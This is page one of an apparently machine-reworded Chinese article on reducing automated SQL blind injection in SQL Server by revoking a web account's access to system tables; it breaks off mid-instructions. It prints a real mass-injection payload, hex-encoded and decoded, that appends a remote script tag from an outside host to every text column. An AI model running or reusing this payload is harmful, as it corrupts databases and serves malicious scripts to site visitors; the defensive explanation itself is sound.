延缓SQL盲注与SQL Server的权限[网络技术]

根源:安全中国

所谓SQL盲注也就是采取自动化的程序来自动的扫描注入点,并可以自动扫描数据表举行大规模批量注入,其危害性也最大.

    这里我们来探究一种与SQL Server权限有关的延缓SQL盲注的办法.

    普通来说SQL盲注的终究注入代码都近似于以下片段（SQL Server 2000/2005）:

DeCLaRE @S NvArCHaR(4000);SeT
@S=CaSt(0x4400650063006C006100720065002000400054002000560061007200630068006100720028003200

3500350029002C0040004300200056006100720063006800610072002800320035003500290020004400650063

006C0061007200650020005400610062006C0065005F0043007500720073006F00720020004300750072007300

6F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C0042002E

004E0061006D0065002000460072006F006D0020005300790073006F0062006A00650063007400730020004100

2C0053007900730063006F006C0075006D006E00730020004200200057006800650072006500200041002E0049

0064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D00270075002700

200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E0058

0074007900700065003D003300350020004F007200200042002E00580074007900700065003D00320033003100

20004F007200200042002E00580074007900700065003D00310036003700290020004F00700065006E00200054

00610062006C0065005F0043007500720073006F00720020004600650074006300680020004E00650078007400

2000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074

006F002000400054002C004000430020005700680069006C006500280040004000460065007400630068005F00

5300740061007400750073003D0030002900200042006500670069006E00200045007800650063002800270075

007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B0027002B0

0400043002B0027005D003D0052007400720069006D00280043006F006E0076006500720074002800560061007

20063006800610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B

00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F003300

620033002E006F00720067002F0063002E006A0073003E003C002F007300630072006900700074003E00270027

00270029004600650074006300680020004E006500780074002000460072006F006D0020002000540061006200

6C0065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E0

06400200043006C006F007300650020005400610062006C0065005F0043007500720073006F007200200044006

50061006C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200

aS NvArChAR(4000));ExEc(@S);--

    解密后就是下面片段:

Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor
For Select A.Name,B.Name From Sysobjects A,Syscolumns B
Where A.Id=B.Id And A.Xtype=’u’
And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C
While(@@Fetch_Status=0)
Begin
Exec(’update [’+@T+’] Set [’+@C+’]=Rtrim(Convert(Varchar(8000),[’+@C+’]))+’’《script src=ｈｔｔｐ:／／３ｂ３．ｏｒｇ／ｃ．ｊｓ》《/script》’’’)
Fetch Next From  Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor

    此中的Script标记我替换掉了.

    一样可以看到当中我用粗体标注出来的表名sysobjects,syscolumns.SQL盲注就是操纵这两个系统表来举行遍历的.

    所以暂时延缓SQL盲注的办法就是将程序中拜候数据库的账号（注意:绝对不要用默许的sa权限,而倡议你为你的Web利用程序单独成立需求的拜候账号）移撤除关于这几个系统表的拜候权限便可避免盲注（我特地注明是盲注,因为注入点还是存在,只是延缓掉SQL盲注罢了）.

    比方你Web利用程序拜候数据库的帐号为tnt001,要禁止掉的关于系统表sysobjects,syscolumns的拜候权限的办法以下:

    SQL Server 2000对比直观简单,而SQL Server 2005开始就完好重构了整个系统架构,有一定差别,所以这里以SQL Server 2005为例来具体阐明（SQL Server 2008近似）:

    Step 1: 挑选某一个具体的数据库,点击节点“安全性”->“用户”,然后挑选你需求的账号比方tnt001,右键挑选属性

    Step 2:挑选属性页的左侧的“安全

[1] [2]  下一页